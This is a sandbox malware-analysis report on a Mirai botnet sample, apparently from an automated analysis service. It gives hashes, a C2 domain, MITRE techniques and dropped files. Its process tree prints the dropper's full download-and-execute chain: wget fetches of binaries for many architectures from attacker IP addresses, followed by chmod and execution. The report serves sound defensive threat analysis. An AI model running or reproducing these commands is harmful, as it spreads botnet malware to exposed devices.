mirai | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1

Analysis

max time kernel
176s
max time network
178s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
02/09/2024, 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Size

8KB
MD5

86311599eaaff9e71ddc72ada1b21c2e
SHA1

572f97e41071d072dfc97127454d4978b50a81e2
SHA256

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1
SHA512

74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317
SSDEEP

96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7

Score

10^/10

mirai botnet

Malware Config

Extracted

Family

mirai

www.akck.ru

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai

Executes dropped EXE 9 IoCs

ioc	pid	Process
/bin/feankzzyx	752	feankzzyx
/bin/feankzzyx	756	feankzzyx
/bin/feankzzyx	760	feankzzyx
/bin/feankzzyx	764	feankzzyx
/bin/feankzzyx	779	feankzzyx
/bin/feankzzyx	797	feankzzyx
/bin/feankzzyx	816	feankzzyx
/bin/feankzzyx	825	feankzzyx
/bin/feankzzyx	829	feankzzyx

Writes file to system bin folder 1 TTPs 14 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/ALLAH_IS_EVIL.txt	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/firmware_v4?user=root&dir=%2Fbin	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/allah_is_satan	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/current_user2	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	bs	829	feankzzyx

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/kernel/ngroups_max	id

/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
1⤵
- Writes file to system bin folder
PID:714
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:717
- /bin/sed
  sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
  2⤵
  - Reads runtime system information
  PID:718
- /usr/bin/whoami
  whoami
  2⤵
  PID:725
- /usr/bin/wget
  wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
  2⤵
  - Writes file to system bin folder
  PID:728
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:739
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:751
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:752
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:754
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:755
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:756
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:758
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:759
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:760
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:762
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:763
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:764
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:766
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:777
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:779
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:782
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:795
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:797
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:800
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:815
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:816
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:819
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:824
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:825
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:827
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:828
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  - Changes its process name
  PID:829

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ALLAH_IS_EVIL.txt

Filesize
828B

MD5
654d89fdcfd44330b80fc359d544adb9

SHA1
53ff7c283c7bab6b7071510349b7785e54da5454

SHA256
43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

SHA512
d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

Download Submit
/bin/allah_is_satan

Filesize
15B

MD5
640832e65d903e762b84b766ea39ed8e

SHA1
a35a203fbae4b913edbd5f00cfc92fe076e39532

SHA256
68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

SHA512
f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

Download Submit
/bin/current_user2

Filesize
5B

MD5
74cc1c60799e0a786ac7094b532f01b1

SHA1
552c0ba71b1046a083583ebf943cc9aa09f39a32

SHA256
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

SHA512
21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

Download Submit
/bin/feankzzyx

Filesize
10B

MD5
7d91028619a806f35dac54dd9f656276

SHA1
ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e

SHA256
8227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484

SHA512
9a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956

Download Submit
/bin/feankzzyx

Filesize
137KB

MD5
bcae0ad478a4924fab82304db8203eed

SHA1
2e4c52e260bfdaab1f317860ce9455d7a80519e6

SHA256
7e9239395e7fa0547d8782ecf1b6213ebdab113095406702fb076741f9e51907

SHA512
73b3a42b595ee8a298ff5dd2ee466628d99ad58625cd3791e671bf91b61acb534dcdae0e87ed279f63b07af0460440b5dec263b3aa8a3bfc47db2925c86d3cc6

Download Submit
/bin/firmware_v4?user=root&dir=%2Fbin

Filesize
4B

MD5
2a76ee31e49f38759ed046466b52a513

SHA1
e31dcb09b650cd3ab532a902888c33da96f45c55

SHA256
7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

SHA512
e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

Download Submit
/etc/d

Filesize
10B

MD5
61ef923b8276f307b7f125a9acc8f004

SHA1
37c300cd00115e00f1aff0d227fc6cd38de572b2

SHA256
3b0aa99677bf9f40c322e3bccaa0e2079e7a99e5516562022c443465e8f9f56e

SHA512
ea54b8caf3a95c08b132c8b3ba711cfbf992927d7c1d5463d9006b8003190891b2f8ea1302c68dae28c5f7fcdf7b2b7eefbafde9a3129e76e906eea63d5c84ea

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads